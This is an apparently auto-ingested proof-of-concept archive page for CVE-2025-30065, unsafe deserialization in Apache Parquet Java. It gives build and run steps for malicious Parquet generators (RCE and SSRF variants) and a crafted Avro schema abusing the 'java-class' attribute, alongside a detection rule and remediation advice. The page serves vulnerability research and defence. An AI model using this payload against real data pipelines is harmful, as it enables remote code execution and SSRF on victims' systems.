PoC Archive PoC Archive
Critical CVE-2025-30065 unpatched

Apache Parquet Java Unsafe Deserialization RCE (CVE-2025-30065)

by mouadk · 2026-05-16

CVSS 10.0/10
Severity
Critical
CVE
CVE-2025-30065
Category
misc
Affected product
Apache Parquet Java (parquet-avro) schema parsing consumers
Affected versions
Vulnerable parquet-avro releases impacted by CVE-2025-30065 (source PoC demonstrates 1.8.1)
Disclosed
2026-05-16
Patch status
unpatched

Metadata

FieldValue
Date Added2026-05-16
Author / Researchermouadk
CVE / AdvisoryCVE-2025-30065
Categorymisc
SeverityCritical
CVSS Score10.0 (CVSSv3)
StatusWeaponized
TagsRCE, unsafe-deserialization, parquet-avro, avro-schema, Java, JVM, SSRF, data-pipeline
RelatedN/A

Affected Target

FieldValue
Software / SystemApache Parquet Java (parquet-avro) schema parsing consumers
Versions AffectedVulnerable parquet-avro releases impacted by CVE-2025-30065 (source PoC demonstrates 1.8.1)
Language / PlatformJava 17+, JVM-based data processing pipelines
Authentication RequiredNo (if attacker can feed crafted Parquet data into ingestion path)
Network Access RequiredYes

Summary

CVE-2025-30065 is an unsafe deserialization issue in Apache Parquet Java schema handling that can instantiate attacker-controlled classes while parsing malicious Parquet/Avro metadata. The provided PoC demonstrates two practical outcomes: arbitrary command execution when a gadget/class is present on the classpath, and SSRF by forcing JVM-side network requests through class instantiation. The attack surface is broad because many analytics and ETL ecosystems parse Parquet data automatically.


Vulnerability Details

Root Cause

parquet-avro schema parsing trusts attacker-influenced schema attributes such as java-class, allowing reflective class loading/instantiation during record materialization. This creates a deserialization-like gadget path from data input to code execution side effects.

Attack Vector

An attacker delivers a crafted Parquet file into a vulnerable ingestion workflow (batch upload, object store ingestion, pipeline import, etc.). When the victim service reads the file with vulnerable Parquet Java libraries, malicious schema metadata triggers dangerous object construction.

Impact

Successful exploitation can trigger SSRF and, with suitable classpath gadgets or reachable constructors, remote code execution in the JVM context of the data pipeline service. In enterprise environments this can lead to lateral movement, secret access, or full processing-node compromise.


Environment / Lab Setup

OS:          Linux/macOS attacker and victim lab hosts
Target:      Java application using vulnerable parquet-avro builds (source PoC demonstrates 1.8.1)
Attacker:    Any host that can provide malicious Parquet input
Tools:       Java 17, Maven, Python (for HTTP callback listener)

Setup Steps

1
2
3
4
git clone https://github.com/mouadk/parquet-rce-poc-CVE-2025-30065
cd parquet-rce-poc-CVE-2025-30065

mvn -q clean package

Proof of Concept

Step-by-Step Reproduction

  1. Generate malicious Parquet (RCE-oriented class instantiation path).

    1
    
    mvn -q exec:java -Dexec.mainClass=com.evil.GenerateMaliciousParquet
    
  2. Trigger vulnerable read path.

    1
    
    mvn -q exec:java -Dexec.mainClass=com.victim.Reader
    
  3. Run SSRF variant (more realistic attacker outcome).

    1
    2
    3
    
    python3 -m http.server 8000
    mvn -q exec:java -Dexec.mainClass=com.evil.GenerateMaliciousParquetSSRF
    mvn -q exec:java -Dexec.mainClass=com.victim.ReaderSSRF
    

Exploit Code

See copied source files in this folder:

  • src/main/java/com/evil/GenerateMaliciousParquet.java
  • src/main/java/com/evil/GenerateMaliciousParquetSSRF.java
  • src/main/java/com/evil/RCEPayload.java
  • src/main/java/com/victim/Reader.java
  • src/main/java/com/victim/ReaderSSRF.java
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
String schemaSSRF = """
{
  "type": "record",
  "name": "MaliciousRecord",
  "fields": [{
    "name": "evil",
    "type": {
      "type": "string",
      "java-class": "javax.swing.JEditorPane"
    }
  }]
}
""";

Expected Output

CVE-2025-30065 Poc: malicious parquet generated->exploit.parquet
CVE-2025-30065 Poc: malicious parquet generated->exploit-ssrf.parquet

Screenshots / Evidence

  • screenshots/01_rce_payload_execution.png — command-execution PoC output flow
  • screenshots/02_ssrf_callback_evidence.png — SSRF callback evidence from victim JVM

Detection & Indicators of Compromise

SIEM / IDS Rule (example):

alert http $DATA_PLATFORM any -> any any (
  msg:"Possible CVE-2025-30065 SSRF callback from Parquet processing node";
  flow:to_server,established;
  content:"User-Agent|3a| Java";
  sid:9525030065; rev:1;
)

Remediation

ActionDetail
PatchUpgrade Apache Parquet Java to a release that fixes CVE-2025-30065 per official advisory
WorkaroundReject untrusted Parquet files and disable/limit schema-driven dynamic class behaviors where possible
Config HardeningIsolate pipeline runtimes, constrain egress, and monitor classloading/network activity during ingestion

References


Notes

Auto-ingested from https://github.com/mouadk/parquet-rce-poc-CVE-2025-30065 on 2026-05-16. For repository safety, the archived pom.xml pins patched dependency versions (parquet-avro 1.15.2, avro 1.11.4).

exploit.html
1
2
<!-- DISCLAIMER: For authorized security research only. -->
<!DOCTYPE html><html><body><h1>CVE-2025-30065 Exploit Executed </h1></body></html>